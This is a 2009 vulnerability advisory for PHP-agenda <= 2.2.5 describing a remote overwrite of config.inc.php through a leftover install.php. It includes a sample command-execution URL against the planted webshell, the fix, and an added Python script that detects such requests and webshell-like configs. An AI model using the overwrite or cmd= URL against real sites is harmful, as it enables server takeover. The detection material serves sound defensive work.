******* Salvatore "drosophila" Fresta *******
[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net
[+] Bugs: [A] Remote File Overwriting
[+] Exploitation: Remote
[+] Date: 10 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Remote File Overwriting
[-] Risk: high
[-] File affected: install.php
This bug allows an unauthenticated visitor to overwrite config.inc.php
with attacker-supplied PHP code, because install.php stays reachable
after the application has been installed.
*************************************************
[+] Code
- [A] Remote File Overwriting
PHP-agenda <= 2.2.5 - Remote File Overwriting
Once config.inc.php has been overwritten through install.php with PHP
that executes the cmd parameter, commands run with a request such as:
http://www.site.com/path/config.inc.php?cmd=uname -a
*************************************************
[+] Fix
Delete install.php as soon as installation is complete; while it remains
reachable, anyone can rewrite config.inc.php.
*************************************************
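The check below is added here as an example and is not part of the original advisory or of PHP-agenda. It covers both points above: it scans web-server access-log lines for requests to install.php and for cmd= calls to config.inc.php (the pattern shown in the Code section), reports whether install.php is still present under a given web root (the condition the fix removes), and flags a config.inc.php whose source passes a request parameter to a PHP execution function. The log lines, the /agenda/ path and the web-root argument are constructed for the example; the webshell heuristic assumes only what the cmd= URL above implies.

```python
import os
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not from any real host.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2009:13:01:02 +0200] "GET /agenda/index.php HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2009:13:01:09 +0200] "POST /agenda/install.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2009:13:01:15 +0200] "GET /agenda/config.inc.php?cmd=uname%20-a HTTP/1.1" 200 97 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Apr/2009:13:02:40 +0200] "GET /agenda/config.inc.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Request superglobals feeding a PHP function that runs code or commands.
REQUEST_INPUT_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
EXEC_CALL_RE = re.compile(r"\b(system|passthru|shell_exec|exec|popen|proc_open|eval)\s*\(")


def find_suspicious_requests(log_text):
    """Return (ip, timestamp, path, detail) tuples for every request to install.php
    and every request to config.inc.php that carries a cmd parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        basename = parts.path.rsplit("/", 1)[-1]
        if basename == "install.php":
            hits.append((m.group("ip"), m.group("ts"), parts.path,
                         "installer still reachable and requested"))
        elif basename == "config.inc.php":
            # parse_qs decodes %20 etc., so the recovered command is readable.
            qs = parse_qs(parts.query, keep_blank_values=True)
            if "cmd" in qs:
                hits.append((m.group("ip"), m.group("ts"), parts.path,
                             "cmd=" + qs["cmd"][0]))
    return hits


def installer_left_behind(webroot):
    """True when install.php still exists under webroot, i.e. the fix was not applied."""
    return os.path.isfile(os.path.join(webroot, "install.php"))


def config_looks_like_webshell(php_source):
    """Heuristic: a legitimate config.inc.php only assigns settings. Flag it when
    a request parameter is read and a code- or command-execution function is called."""
    return bool(REQUEST_INPUT_RE.search(php_source) and EXEC_CALL_RE.search(php_source))


def config_file_looks_like_webshell(config_path):
    """Same heuristic applied to a file on disk; missing file counts as not flagged."""
    if not os.path.isfile(config_path):
        return False
    with open(config_path, encoding="utf-8", errors="replace") as fh:
        return config_looks_like_webshell(fh.read())


if __name__ == "__main__":
    # webroot is a hypothetical path; change it to the real PHP-agenda directory.
    webroot = "/var/www/agenda"
    for ip, ts, path, detail in find_suspicious_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {path}: {detail}")
    if installer_left_behind(webroot):
        print(f"install.php is still present under {webroot}: delete it")
    if config_file_looks_like_webshell(os.path.join(webroot, "config.inc.php")):
        print("config.inc.php executes request input: treat it as overwritten")
```

Run it against the real access log by replacing SAMPLE_LOG with the log contents; a cmd= hit on config.inc.php with status 200 means the overwrite has already happened, so the installer check alone is not enough.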
--
Salvatore "drosophila" Fresta
CWNP444351
[Attachment: "PHP-agenda <= 2.2.5 Remote File Overwriting-10042009.txt" (base64 body not reproduced)]